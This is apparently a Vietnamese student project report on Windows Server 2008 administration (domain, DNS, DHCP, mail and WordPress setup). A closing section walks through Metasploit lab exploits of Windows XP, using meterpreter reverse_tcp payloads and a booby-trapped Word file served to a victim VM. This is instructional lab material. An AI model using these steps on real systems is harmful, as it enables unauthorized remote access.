Network Load Balancing, Group Policy Management, … ; từ hệ thống firewall,
quản lý users và groups đến các dịch vụ sao lưu hệ thống, quản lý đĩa v.v…
Có thể nói rằng công cụ này là kết quả của sự kết hợp hoàn hảo các công cụ
quản lý trên những phiên bản Windows trước đó.
Theo mặc định, Server Manager sẽ tự động khởi động ngay sau khi bạn đăng
nhập vào hệ thống. Nếu đã đóng cửa sổ này, ta có thể thực hiện một trong những
cách sau để mở lại:
Kích chuột phải vào biểu tượng Computer trên desktop, chọn Manage.
Các thành phần trong Server Manager
Khi làm việc với Server Manager, ta sẽ tương tác với 5 thành phần chính :
- Roles cho phép bổ sung và loại bỏ các dịch vụ của server. Tại đây ta
cũng có thể quản lý chi tiết dữ liệu tương ứng với mỗi dịch vụ.
- Features cho phép bổ sung và loại bỏ các thành phần trên Windows
Server 2008. Chức năng này tương tự như Add/Remove Windows Components
trong các phiên bản Windows trước đó.
- Diagnostics tích hợp các thành phần Event Viewer, Reliability and
Performance và Device Manager.
- Configuration bao gồm các công cụ Local Users And Group, Task
Scheduler, Windows Firewall with Advanced Security, WMI Control và
Services. WMI Control được dùng để quản lý các dịch vụ Windows Management
Instrumentation.
- Storage tích hợp hai công cụ Windows Server Backup và Disk
Management.

Trang 31
Hình 1.2-4 Quản lý chi tiết trên Active Directory Users and Computer.
Quản lý các dịch vụ Server (Roles)
Để mở các cửa sổ quản lý các dịch vụ server, ta chọn mục Roles ở khung
bên trái của màn hình Server Manager. Trên Windows Server 2008 nói chung, ta
có thể triển khai tất cả 16 dịch vụ server từ Active Directory Domain Services đến
các server như DHCP, DNS, Web, …
Lưu ý: ngoài 16 dịch vụ server có mặt trên tất cả các phiên bản Windows
Server 2008, Microsoft còn cung cấp một dịch vụ server nữa, đó là Hyper-V.
Hyper-V là công nghệ ảo hóa chỉ chạy trên các nền tảng hệ điều hành 64-bit.
Để cài đặt một dịch vụ server bất kỳ, ta đánh dấu chọn vào ô tương ứng trên
hộp thoại Select Server Roles. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến
trình cài đặt, tùy theo đặc điểm riêng của từng dịch vụ server, ta sẽ điền thông tin và
thực hiện các thao tác cần thiết để hoàn thành tiến trình.

Trang 32
Hình 1.2-5 Các dịch vụ Server trên Windows Server 2008
Quản lý các thành phần (Features)
Để mở cửa sổ quản lý các thành phần, ta chọn mục Features ở khung bên
trái của màn hình Server Manager. Trên Windows Server 2008 ta có thể tương tác
với tất cả 35 thành phần.
Để cài đặt một thành phần bất kỳ, bạn đánh dấu chọn vào ô tương ứng trên
hộp thoại Select Features. Tiếp theo, bấm nút Install để bắt đầu. Trong tiến trình
cài đặt, tùy theo đặc điểm riêng của từng thành phần, bạn sẽ điền thông tin và thực
hiện các thao tác cần thiết để hoàn thành tiến trình.

Trang 33
Hình.1.2-6 Các thành phần Feature trên Windows Server 2008.
Sau khi cài đặt xong, thông tin và trạng thái của các thành phần sẽ hiển thị
trong khung Features Summary thuộc cửa sổ Server Manager. Tại đây, ta cũng
có thể thực hiện các thao tác bổ sung và loại bỏ các thành phần này.
Quản lý không gian lưu trữ và sao lưu dữ liệu (Storage) và Backup Server.
Mặc định, Windows Server Backup chưa sẵn dùng trên Windows Server
2008. Do đó, ta cần bổ sung thành phần này vào hệ thống trước khi sử dụng. Các
bước thực hiện như sau :

Trang 34
Trong cửa sổ Server Manager, ở khung Feature Summary, ta chọn Add
Features.
Hình 1.2-7
Trong màn hình Select Features, đánh dấu chọn mục Windows Server Backup
Features và bấm nút Next.
Hình 1.2-8

Trang 35
Trong màn hình Confirm Insatallation Selection, bấm nút Install để bắt đầu cài
đặt.
Hình 1.2-9
Trong màn hình Installation Results, bấm nút Close để hoàn thành thao tác bổ
sung thành phần cần thiết vào Windows Server 2008
Hình 1.2-10

Trang 36
Kích chuột phải lên mục Windows Server Backup trong Storage, chọn Backup
Schedule.
Hình 1.2-11
Trong màn hình Getting started, bấm nút Next.
Hình 1.2-12

Trang 37
Trong màn hình Select backup configuration, chọn Custom nhấn Next.
Hình 1.2-13
Trong màn hình Select backup items, chọn ổ đĩa chứa hệ điều hành, trong trường
hợp này là ổ đĩa C: nhấn nút Next.
Hình 1.2-14

Trang 38
Trong màn hình Specify backup time, chọn số lần và thời điểm sao lưu. Ở đây,
chúng ta chọn sao lưu vào lúc 9:00 tối mỗi ngày (Once a day). Sau khi chọn xong,
nhấn nút Next.
Hình 1.2-15
Trong màn hình Select destination disk, đánh dấu chọn vào ổ đĩa mà ta sẽ sao lưu
đến và nhấn Next.

Trang 39
Hình 1.2-16
Nhấn Yes để tiếp tục.
Hình 1.2-17
Trong màn hình Label destination disk, nhấn Next.

Trang 40
Hình 1.2-18

Trang 41
Trong cửa sổ Confirmation nhấn Finish.
Hình 1.2-19
Trong màn hình Summary nhấn Finish để hoàn thành thao tác tạo lịch trình sao lưu
ổ đĩa. Cuối cùng nhấn Close để đóng.

Trang 42
Hình 1.2-20

Trang 43
1.3 Cấu hình Domain
1.3.1 Mục đích
Cài Domain Controller trên máy server và tiến hành join PC vào Domain và
đăng nhập Domain Administrator để sử dụng Administrator Tools cho máy PC.
Mục đích cuối cùng là cài đặt Domain Controller và join PC vào Domain
thành công.
1.3.2 Mô hình.
Gồm 1 Server và 1 PC.
Hình 1.3.2
1.3.3 Các bước thực hiện
Giống như Windows Server 2003 sẽ vẫn cần chạy dcpromo từ nhắc lệnh Run, tuy
nhiên cần phải cài đặt Active Directory Domain Controller role, đầu tiên bạn cài
đặt role, sau đó chạy dcpromo.Vào Server Manager  Roles  Add Roles

Trang 44
(Hình 1.3.4-1)
Xuất hiện trang Before You Begin, nhấn Next để tiếp tục.
(Hình 1.3.4-2)

Trang 45
Chọn Active Directory Domain Services Add Required Features để cài đặt
thêm các tính năng này với Active Directory Server Role.
(Hình 1.3.4-2)
Sau khi chọn Active Directory DC Server Role, bạn sẽ thấy các thông tin về Server
Role.
Kích Install để cài đặt các file yêu cầu nhằm chạy dcpromo

Trang 46
(Hình 1.3.4-3)
Cài đặt được thực hiện thành công. Kích Close.
(Hình 1.3.4-4)

Trang 47
Lúc này vào menu Start, đánh dcpromo vào hộp tìm kiếm. Kích dcpromo
(Hình 1.3.4-5)
Thao tác này sẽ khởi chạy Welcome to the Active Directory Domain Service
Installation Wizard. Kích Next.
(Hình 1.3.4-6)

Trang 48
Sau đó tiếp tục nhấn Next.
Trong trang Choose a Deployment Configuration Create a new domain in a
new forest..
(Hình 1.3.4-7)
Trong trang Name the Forest Root Domain, nhập vào tên của miền trong hộp nhập
liệu FQDN of the forest room domain.Nhấn Next để tiếp tục.

Trang 49
(Hình 1.3.4-8)
Trong trang Set Forest Functional Level, chọn Windows Server 2008. Nhấn Next
để tiếp tục.

Trang 50
(Hình 1.3.4-9)
Trong trang Additional Domain Controller Options, Chọn DNS server và kích
Next.

Trang 51
(Hình 1.3.4-10)
Một hộp thoại sẽ xuất hiện nói răng không thể tạo đại biểu cho máy chủ DNS này vì
không thể tìm thấy vùng xác thực hoặc nó không chạy Windows DNS server. Lý do
cho điều này là vì đây là DC đầu tiên trên mạng. Nhấn Next để tiếp tục.
(Hình 1.3.4-11)

Trang 52
Để lại thư mục Database, Log Files và SYSVOL, kích Next.
(Hình 1.3.4-12)
Trong Directory Service Restore Mode Administrator Password, nhập một mật
khẩu mạnh vào các hộp nhập liệu Password và Confirm password.

Trang 53
(Hình 1.3.4-13)
Xác nhận các thông tin trên trang Summary và kích Next.

Trang 54
(Hình 1.3.4-14)
Active Directory sẽ cài đặt. Đặt một dấu kiểm vào hộp chọn Reboot on completion
để máy tính sẽ tự động khởi động lại khi cài đặt DC được hoàn tất.
(Hình 1.3.4-15)

Trang 55
. Cài đặt sẽ hoàn tất khi đăng nhập.
JON DOMAIN
Đầu tiên chúng ta sẽ trỏ đường dẫn IP của máy cline về ip của server.
(Hình 1.3.4-16)
Trên Desktop: Click phải icon Computer > Properties
Hộp thoại System: Change settings

Trang 56
(Hình 1.3.4-17)
Hộp thoại System Properties: tab Computer Name > Change

Trang 57
(Hình 1.3.4-18)
Hộp thoại Computer Name / Domain
Changes: Chọn “Domain” > nhập domain
name: Athena.edu.vn > OK

Trang 58
(Hình 1.3.4-19)
Hộp thoại Windows Security: Nhập user name Admintrator or user & password
P@ssword > OK
(Hình 1.3.4-20)

Trang 59
Changes: OK
(Hình 1.3.4-21)
Changes: OK
(Hình 1.3.4-22)
Hộp thoại Microsoft Windows: Restart Now
Sau khi WS khởi động xong, quá trình gia Nhập domain hoàn tất.

Trang 60
(Hình 1.3.4-23)
1.4 Cài đặt dịch vụ DNS
DNS (Domain Name System) Server là máy chủ được dùng để phân giải
Domain thành địa chỉ IP và ngược lại. Ví dụ: athena.edu.vn là 192.168.1.82.
Về cách thức hoạt động, DNS Server lưu trữ một cơ sở dữ liệu bao gồm
các bản ghi DNS và dịch vụ lắng nghe các yêu cầu. Khi máy client gửi yêu cầu
phân giải đến, DNS Server tiến hành tra cứu trong cơ sở dữ liệu và gửi kết quả
tương ứng về máy client.
Tại cửa sổ Server Manager, chọn mục Roles, chọn mục Add Roles.
Hình 1.4-1
Chọn DNS và click Next

Trang 61
Hình 1.4-2
Nhấn Next.
Hình 1.4-3

Trang 62
Click Install để cài đặt DNS
Hình 1.4-4
Quá trình cài đặt hoàn tất.
Hình 1.4-5

Trang 63
Để cấu hình DNS Server vào menu Start  Administrative Tools → DNS.
Hình 1.4-6
Right click Forward Lookup Zones, chọn New Zone.
Hình 1.4-7

Trang 64
Trong màn hình Welcome, nhấn Next.
Hình 1.4-8
Trong màn hình Zone Type, chọn Primary zone để cấu hình DNS Server chính.
Sau đó nhấn Next.
Hình 1.4-9

Trang 65
Trong màn hình Zone Name, ta nhập tên zone vào mục Zone name, ví dụ
athena.edu.vn. Sau đó nhấn Next.
Hình 1.4-10
Trong màn hình Zone File, ta chấp nhận giá trị mặc định và nhấn Next.
Hình 1.4-11

Trang 66
Để mặc định và nhấn Next.
Hình 1.4-12
Trong màn hình Completing, ta xem lại thông tin về DNS Server và nhấn Finish để
hoàn thành thao tác cấu hình DNS.
Hình 1.4-13

Trang 67
Tiếp theo, ta Right click vào athena.edu.vn chọn New Host(A or AAA)…
Hình 1.4-14
Trong cửa sổ New Host điền www vào Name, nhập IP 192.168.1.82 vào IP
address, nhấn Add Host.
Hình 1.4-15
Tạo host thành công, nhấn OK.

Trang 68
Hình 1.4-16
Tương tự ta tạo thêm host mail.
Hình 1.4-17
Tạo host mail thành công, nhấn OK.
Hình 1.4-18

Trang 69
Với các bước vừa thực hiện ở trên, ta đã cấu hình chức năng Forward.
Tiếp theo, ta sẽ cấu hình chức năng Reverse. Right click Reverse Lookup Zones,
chọn New Zone.
Hình 1.4-19
Trong màn hình Welcome, nhấn Next.
Hình 1.4-20

Trang 70
Trong màn hình Zone Type, chọn Primary. Sau đó nhấn Next.
Hình 1.4-21
Trong màn hình Reverse Lookup Zone Name, chọn Ipv4.

Trang 71
Hình 1.4-22
Tiếp theo, điền Network ID của mình và nhấn Next.
Hình 1.4-23

Trang 72
Trong màn hình Zone File, chấp nhận giá trị mặc định nhằm tạo ra một file dùng để
lưu các bản ghi DNS cho zone này, nhấn Next.
Hình 1.4-24
Trong màn hình Dynamic Update, chọn Do not allow dynamic updates và nhấn
Next.

Trang 73
Hình 1.4-25
Trong màn hình Completing, nhấn Finish để hoàn thành thao tác cấu hình chức
năng Reverse trên DNS Server chính.
Hình 1.4-26

Trang 74
Cấu hình host đại diện dùng để phân giải tên ra số.
Trong màn hình DNS Manager, chọn Forward Lokkup Zones, right click
athena.edu.vn, chọn New Pointer (PTR)…
Hình 1.4-27

Trang 75
Mục Host IP_Address nhập 192.168.1.1 và mục Host name nhấn Browse….
Chọn đến www.athena.edu.vn. Nhấn OK.
Hình 1.4-28
Tương tự cho mail

Trang 76
Hình 1.4-29
Để kiểm tra, vào cmd gõ nslookup, www.athena.edu.vn, mail.athena.edu.vn.
Hình 1.4-30
Cài đặt và cấu hình DNS thành công.

Trang 77
1.5 Cấu hình DHCP
- Dịch vụ DHCP cho phép chúng ta cấp động các thông số cấu hình mạng cho
các máy trạm.(client).
- Cơ chế sử dụng các thông số mạng được cấp phát động có ưu điểm hơn so
với cơ chế khai báo tĩnh các thông số mạng như:
-Khắc phục được tình trạng đụng địa chỉ IP và giảm chi phí quản trị cho hệ
thống mạng.Giúp cho các nhà cung cấp dịch vụ (ISP) tiết kiệm được số lượng địa
chỉ IP thật (Public IP).Phù hợp cho các máy tính thường xuyên di chuyển qua lại
giữa các mạng.Kết hợp với hệ thống mạng không dây (Wireless) cung cấp các điểm
Hotspot như: nhà ga, sân bay, trường học…
Đối với Windows Server 2008, cách thức cài đặt và cấu hình được mô tả
chi tiết ngay sau đây.
Mở cửa sổ Server Manager. Trong khung ở bên phải, nhấn Add Roles.
Hình 1.5-1

Trang 78
Chọn dịch vụ DHCP và nhấn Next.
Hình 1.5-2
Nhấn Next.

Trang 79
Hình 1.5-3
Chọn card mạng lắng nghe yêu cầu xin cấp DHCP và nhấn Next.
Hình 1.5-4

Trang 80
Nhập thông tin về Domain và các DNS Server, sau đó nhấn Next.
Hình 1.5-5
Trong màn hình Specify IPv4 WINS Server Settings, chọn WINS is not required
for applications on this network. Sau đó nhấn Next.

Trang 81
Hình 1.5-6
Trong màn hình Add or Edit DHCP Scopes, nhấn Add. Và điền các thông tin cần
thiết. và nhấn OK.
Hình 1.5-7
Sau khi hoàn thành việc định nghĩa các dãy địa chỉ, ta nhấn Next trong màn hình
Add or Edit DHCP Scopes.

Trang 82
Hình 1.5-8
Trong màn hình Configure DHCPv6 Stateless Mode, chọn Disable DHCPv6
stateless mode for this server.
Hình 1.5-9

Trang 83
Trong màn hình Authorize DHCP Server, chọn tài khoản dùng để cấp phép
(authorizing) cho DHCP Server trong Active Directory Domain Services. Sau đó,
nhấn Next.
Hình 1.5-10
Trong màn hình Confirm Installation Selections, ta xem lại các thiết lập vừa thực
hiện và nhấn Install để bắt đầu cài đặt.

Trang 84
Hình 1.5-11
Như vậy chúng ta đã hoàn tất quá trình cài đặt và cấu hình dịch vụ DHCP.
Đến đây, DHCP đã sẵn sàng cung cấp địa chỉ IP cho các máy trạm trong hệ
thống mạng. Nếu muốn hiệu chỉnh các thông số cấu hình, ta thực hiện theo các
bước sau:
Vào menu Start/Programs/Administrative Tools, chọn DHCP.

Trang 85
Hình 1.5-12
Mở rộng mục IPv4, right click dòng Scope [192.168.1.0], chọn Properties.
Hình 1.5-13
Trên tab General, ta có thể thay đổi các giá trị Scope name, Start IP address, End
IP address, giới hạn thời gian địa chỉ IP tồn tại trên máy trạm.

Trang 86
Hình 1.5-14
Để thay đổi gateway, ta kích chuột phải lên mục 003 Router trong Scope Options,
chọn Properties.
Hình 1.5-15

Trang 87
Thay đổi giá trị gateway bằng các chức năng Add và Remove.
Hình 1.5-16
Để thay đổi địa chỉ các DNS Server, right click dòng 006 DNS Servers trong
Server Options, chọn Properties.
Hình 1.5-17

Trang 88
Thay đổi địa chỉ của DNS Server bằng chức năng Add và Remove.
Hình 1.5-18
Để thay đổi tên miền, right click dòng 015 DNS Domain Name trong Server
Options, chọn Properties.
Hình 1.5-19

Trang 89
Nhập tên miền mới vào mục String value.
Hình 1.5-20
Cấu hình địa chỉ IP động trên máy trạm ta mở cửa sổ Network Connections và truy
cập vào hộp thoại Internet Protocol (TCP/IP) Properties. Tại đây, ta chọn Obtain
an IP address automatically và Obtain DNS server address automatically. Sau
đó nhấn OK.

Trang 90
Hình 1.5-21
Trên máy trạm lệnh xin cấp địa chỉ DHCP bằng cách vào Start  Run  gõ cmd
 Enter.
Hình 1.5-22

Trang 91
Gõ lệnh inconfig /renew.
Hình 1.5-23
Để xin trả lại địa chỉ IP mà DHCP đã cấp gõ lệnh ipconfig /release.
Hình 1.5-24
Như vậy chúng ta đã hoàn thành việc cấp địa chỉ IP động bằng dịch vụ DHCP

Trang 92
Hình 1.5-25
2 Làm việc với Windows Sever2008 trên máy chủ ảo VPS
2.1 Giới thiệu về máy chủ ảo VPS
VPS theo lưu lượng là loại hình máy chủ VPS tiện dụng, phù hợp & đem
lại nhiều lợi ích, hiệu quả cho các khách hàng mong muốn có một máy chủ riêng
với chi phí cực thấp.
VPS là dịch vụ máy chủ chạy dưới dạng chia sẻ từ 1 tài nguyên server
chính hoạt động như một Dedicated Server. Người quản trị (khách hàng) có quyền
cao nhất để toàn quyền quản trị Server.

Trang 93
VPS kết nối Internet với 01 IP tĩnh và được cài đặt sẵn hệ điều hành tùy
chọn. VPS quản trị từ xa và cài đặt các phần mềm theo nhu cầu mà không bị giới
hạn số lượng domain.
VPS thích hợp cho việc xây dựng hệ thống Mail Server, Web Server,
Backup/Storage Server... dùng riêng hoặc truyền tải file dữ liệu giữa các chi nhánh
với nhau một cách dễ dàng, nhanh chóng thuận tiện và bảo mật.
VPS dễ dàng nâng cấp tài nguyên mà không cần trang bị phần cứng máy
chủ giảm tối đa chi phí.
VPS dễ dàng tái tạo lại hệ điều hành khi gặp sự cố hệ thống với thời gian
thực hiện rất nhanh mà hoàn toàn không cần cài đặt lại từ đầu.
VPS như một giải pháp dung hòa giữa Web Hosting và Dedicated Server
theo cả nghĩa chi phí và cách thức vận hành, vì vậy đây là giải pháp phù hợp cho
các cá nhân hoặc doanh nghiệp nhỏ muốn có một hệ thống máy chủ riêng biệt, toàn
quyền quản lý với chi phí thấp.
Hình 3.2.1 Giao diện Remote Desktop Connection

Trang 94
Thông qua chương trình Remote Desktop Connection ta truy cập vào VPS đã được
thuê để tiến hành cấu hình, triển khai các dịch vụ như trên máy thật.
Hình 3.2.2 Giao diện ban đầu khi đăng nhập vào máy chủ VPS
Chúng ta tiến hành nhập User name và Password đã được cung cấp từ bên cho thuê
để truy cập vào.
Hình 3.2.3 Giao diện khi đã đăng nhập vào máy chủ VPS
2.2 Mail Server
Hiện nay có rất nhiều phần mềm quản lý Mail trên Server như: Mail
Exchange,… nhưng MDaemon Mail Server: là 1 trong những giải pháp hệ thống
Mail Server toàn diện nhất hiện nay dành cho các công ty, doanh nghiệp với quy mô
khác nhau. MDaemon Mail Server hiện có 3 phiên bản: Standard, Pro và Free. Sau
đây là một số điểm đáng chú ý của chương trình.

Trang 95
Hình 2.2-1 Giao diện Mdeamon.
Màn hình hiển thị chính của MDaemon (Graphical User Interface - GUI) đưa
ra thông tin quan trọng về các nguồn tài nguyên, các giao dịch, số liệu thống kê,
luồng dữ liệu đang trong trạng thái hoạt động (active) và các mail đang trong quá
trình chờ đợi (queued) để được xử lý. Bên cạnh đó, còn có sự lựa chọn cho người
dùng chuyển đổi trạng thái activating/deactivating đối với các hệ thống máy chủ
khác nhau có sử dụng MDaemon. Cửa sổ bên phải hiển thị đầy đủ thông tin về kết
nối dữ liệu đầu vào và ra (incoming và outgoing) đang được thực hiện.

Trang 96
Sau đây là quá trình cài đặt 1 Mail Server trên phần mềm Mdeamon.
Trước tiên, ta tải phiên bản MDaemon Mail Server mới nhất và bắt đầu quá
trình cài đặt.
Hình 2.2-2
Hình 2.2-3

Trang 97
Bấm "Next" để tiếp tục.
Hình 2.2-4
Đánh dấu vào ô "I have read and I agree with all the terms of this license
agreement"
Hình 2.2-5

Trang 98
Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài
hệ điều hành Microsoft Windows).
Hình 2.2-6
Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới.
Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.
Hình 2.2-7

Trang 99
Nhấn Next để tiếp tục
Hình 2.2-8
Tiến trình đang cài đặt
Hình 2.2-9
Điền tên Domain: tranlevu.tk

Trang 100
Hình 2.2-10
Hình 2.2-11
Primary DNS IP Address và Backup DNS IP Address: điền địa chỉ DNS
14.0.21.130
Hình 2.2-12
Giữ nguyên lựa chọn "Setup MDaemon as a system service"

Trang 101
Hình 2.2-13
Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng
Hình 2.2-14

Trang 102
Giao diện sau khi cài đặt thành công.
Hình 2.2-15

Trang 103
Tạo 1 tài khoản mới vào Account  New Account…
Hình 2.2-16
Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoản
Email.
Hình 2.2-17

Trang 104
Vào OutLook Express.
Hình 2.2-18
Cấu hình Out Look mail để quản lý mail cho tài khoản. Nhập tên hiển thị vào
Display name và nhấn Next.
Hình 2.2-19

Trang 105
Nhập địa chỉ Email và nhấn Next.
Hình 2.2-20
Nhập địa chỉ IP máy VPS vào 2 ô Incoming và Outgoing và click Next.
Hình 2.2-21
Nhập tên tài khoản và mật khẩu. Nhấn Next

Trang 106
Hình 2.2-22
Click Finish để hoàn tất cấu hình quản lý mail cho tài khoản.
Hình 2.2-23

Trang 107
Tiến hành gởi mail đến gmail và yahoo mail
VD: athena1@lehuubang.ddns.net gởi đến ruacon676@gmail.com và
ruacon676@yahoo.com
Hình 2.2-24

Trang 108
Gmail đã nhận được Mail từ athena1@lehuubang.ddns.net
Sau đó tiến hành reply cho athena1@lehuubang.ddns.net
Hình 2.2-25
Yahoo mail đã nhận được Mail từ athena1@lehuubang.ddns.net
Hình 2.2-26
Athena1 nhận mail thành công từ gmail và yahoo mail.
Như vậy chúng ta đã hoàn thành việc cài đặt và quản lý một Mail Server trên phần
mềm Mdeamon.

Trang 109
2.3 Cài đặt và cấuhình Web Server trên VPS
2.3 Cài đặt và cấu hình Web Server trên VPS
XAMPP là một bộ công cụ lập trình PHP có thể cài đặt được trên nhiều
nền tảng khác nhau. Chữ X đầu tiên trong cụm từ XAMPP ám chỉ cross-platform
nghĩa là XAMPP có thể chạy trên Windows, Linux, Mac OS, Solaris, còn các ký tự
còn lại mang các ý nghĩa sau:
A = Apache, XAMPP bao gồm 1 Apache HTTP Server giúp chạy các ứng dụng
web.
M = MySQL, hệ quản trị cơ sở dữ liệu My SQL cũng được bao gồm trong XAMPP.
P = PHP – ngôn ngữ lập trình PHP.
P = Perl – ngôn ngữ lập trình Perl.

Trang 110
Sau đây chúng ta cùng cài đặt và cấu hình Web Server bằng Xampp 1.7.3
Đăng nhập máy chủ ảo VPS
Hình 2.3-1
Chúng ta download và tiến hành chạy file xampp1.7.3.exe để cài đặt.
Hình 2.3-2
Chọn Run để cài đặt.

Trang 111
Hình 2.3-3
Theo mặc định XAMPP sẽ được cài đặt ở đường dẫn C:xampp, ta có thể nhấn
Browse… và chọn đường dẫn cài đặt khác. Sau đó nhấn Install.
Hình 2.3-4
Xampp tiến hành giải nén.

Trang 112
Hình 2.3-5
Gõ y → Enter.
Hình 2.3-6
Gõ y → Enter.

Trang 113
Hình 2.3-7
Gõ n → Enter.
Hình 2.3-8

Trang 114
Nhấn phím bất kì để tiếp tục.
Hình 2.3-9
Gõ x → Enter.
Hình 2.3-10
Quá trình cài đặt XAMPP hoàn tất.
Double click XAMPP Control Panel trên Desktop.
Hình 2.3-11

Trang 115

Trang 116
Click Start ở mục Apache và MySql trong Xampp Control Panel Application.
Hình 2.3-12
Vào trình duyệt web và gõ vào localhost. Và chọn ngôn ngữ là English.
Hình 2.3-13

Trang 117
Click vào phpMyAdmin.
Hình 2.3-14
Ta đặt tên cơ sở dữ liệu vào ô Create new database và click Create để tạo
database.
Hình 2.3-15

Trang 118
Database đã được tạo thành công.
Hình 2.3-16
Tiếp theo ta copy mã nguồn wordpress mà chúng ta đã download trên Internet vào
đường dẫn cài đặt C:xampphtdocs.
Hình 2.3-17

Trang 119
Vào thư mục wordpress mà chúng ta vừa copy xong, tìm File wp-config-
sample.php và mở nó lên bằng Notepad.
Hình 2.3-18
Tìm và sửa thông tin lại như hình. Save lại.
Hình 2.3-19

Trang 120
Đổi tên file vừa sửa lại thành wp-config.php.
Hình 2.3-20
Đổi tên folder wordpress trong hthocs thành news cho dễ quản lý.
Hình 2.3-21

Trang 121
Vào trình duyệt web gõ đường dẫn localhost/news nhấn Enter.
Hình 2.3-22
Sau đó click Install wordpress.
Hình 2.3-23

Trang 122
Cấu hình Wordpress thành công. Ta Click Log In.
Hình 2.3-24

Trang 123
Điền thông tin vừa thiết lập, click Log In.
Hình 2.3-25
Màn hình sau khi đăng nhập thành công.
Hình 2.3-26

Trang 124
Ta vào Settings → General → điền địa chỉ chúng ta muốn truy cập khi lướt web
vào 2 ô Wordpress address và Site Address. Nhấn Save Changes.
Hình 2.3-27
Trang chủ của Web chúng ta khi vừa tạo xong.
Hình 2.3-28
Tùy vào sở thích, tính thẳm mỹ của mỗi người ta có thể Design cho mình một trang
web đẹp mắt.

Trang 125
3 Bảo mật windows
3.1 Khai thác lỗ hỏng trên Windows XP với mã lỗi MS10_042
Chuẩn bị 2 máy ảo: máy Backtrack 5 R3 (máy tấn công) và Windows XP (nạn
nhân)
Hình 3.1-1
Hình 3.1-2
Trên máy BackTrack cấu hình địa chỉ IP trong bài lab này cho máy là:
192.168.177.131

Trang 126
Hình 3.1-3
Trên máy BackTrack vào chương trình terminal và gõ lệnh msfconsole
Hình 3.1-4
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_042

Trang 127
Hình 3.1-5
Sau khi search được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Hình 3.1-6

Trang 128
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
Hình 3.1-7
Dùng lệnh srvhost<địa chỉ ip máy backtrack>
Hình 3.1-8
Dùng lệnh Set payload windows/meterpreter/preverse_tcp

Trang 129
Hình 3.1-9
Dùng lệnh Set lhost<ip backtrack>
Hình 3.1-10

Trang 130
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn
http://192.168.255.131:80 nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Hình 3.1-11
Máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là
192.168.177.132
Trên máy XP ta vào trình duyệt web và gõ đường dẫn http://192.168.177.131:80
Hình 3.1-13

Trang 131
Trên máy XP tự động xuất hiện hộp thoại Help and Support.
Hình 3.1-14
Trên máy BackTrack bắt đầu nhận thấy có sự kết nối đến địa chỉ 192.168.177.132
Hình 3.1-15

Trang 132
Dùng lệnh sessions –i 1
Hình 3.1-18
Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác
thành công lỗ hổng MS12_042 trên máy XP.
Hình 3.1-19

Trang 133
3.2 Khai thác lỗ hỏng bảo mật Win XP mã lỗi MS12_004
nhân)
Hình 3.2-1
Hình 3.2-2
192.168.177.131

Trang 134
Hình 3.2-3
Hình 3.2-4

Trang 135
Hình 3.2-5
Hình 3.2-6

Trang 136
Hình 3.2-7
Dùng lệnh srvhost<địa chỉ ip máy backtrack>
Hình 3.2-8
Dùng lệnh Set payload windows/meterpreter/preverse_tcp

Trang 137
Hình 3.2-9
Hình 3.2-10

Trang 138
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn
http://192.168.255.128:8080/BIhLISbueVnN nếu máy nạn nhân vào đường dẫn này
sẽ bị hack.
Hình 3.2-11
Máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là
192.168.1.132

Trang 139
Trên máy XP ta vào trình duyệt web và gõ đường dẫn
http://192.168.177.131:80/YQLxzg3eM
Hình 3.2-13

Trang 140
Trên máy XP tự động sẽ bị hack.
Trên máy BackTrack bắt đầu nhận thấy có sự kết nối đến địa chỉ 192.168.177.131
Hình 3.2-16

Trang 141
Dùng lệnh sessions –i 1
Hình 3.2-18
Dùng lệnh sysinfo để xem thông tin máy nạn nhân. Và như vậy ta đã khai thác
thành công lỗ hổng MS12_004 trên máy XP.
Hình 3.2-19

Trang 142
3.3 Khai thác lỗ hổng trên Win XP với mã lỗi MS12_027
nhân)
Hình 3.3-1
Hình 3.3-2
192.168.255.128

Trang 143
Hình 3.3-3
Hình 3.3-4

Trang 144
Hình 3.3-5
Hình 3.3.6
Hình 3.3-7
Dùng lệnh Set filenametên file. (vd: baocao.doc)
Hình 3.3-8

Trang 145
Dùng lệnh Set Payload windows/meterpreter/preverse_tcp
Hình 3.3-9
Hình 3.3-10
Dùng lệnh exploit để khai thác lỗi.
Hình 3.3-11
Copy file đã tiêm mã độc ra ngoài màn hình destop bằng lệnh cpđường dẫn file
nguồnđường dẫn file đích
Hình 3.3-12
Dùng lệnh use/exploit/multi/handler
Hình 3.3-13
Copy file baocao.doc ở Desktop vào thư mục var/www và upload file này lên web.
Mở thêm cửa sổ root mới gõ lệnh /etc/init.d/apache2 start.

Trang 146
Hình 3.3-14
Dùng lệnh Set Payload windows/meterpreter/reverse_tcp
Hình 3.3-15
Hình 3.3-16
Dùng lệnh exploit để bắt đầu lắng nghe.
Hình 3.3-17
Trên máy XP ta vào trình duyệt web để download file ta đã up trên máy BackTrack
bằng cách gõ: 192.168.255.128/baocao.doc
Hình 3.3-18
Xuất hiện hộp thoại và nhấn Save để download

Trang 147
Hình 3.3-19
Khi máy XP mở file word có nhiễm mã độc thì sẽ bị hack.
Hình 3.3-20

Trang 148
Bên máy BackTrack đã nhận thấy 1 kết nối và tạo phiên kết nối với nạn nhân.
Hình 3.3-21
Dùng lệnh sysinfo để kiểm tra. Như vậy ta đã hoàn thành khai thác lỗi MS12_027
trên win XP.
Hình 3.3-22

Lê hữu bằng _đồ án cuối kỳ các chính sách win server 2008

Lê hữu bằng _đồ án cuối kỳ các chính sách win server 2008

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (14)

Similar to Lê hữu bằng _đồ án cuối kỳ các chính sách win server 2008

Similar to Lê hữu bằng _đồ án cuối kỳ các chính sách win server 2008 (20)
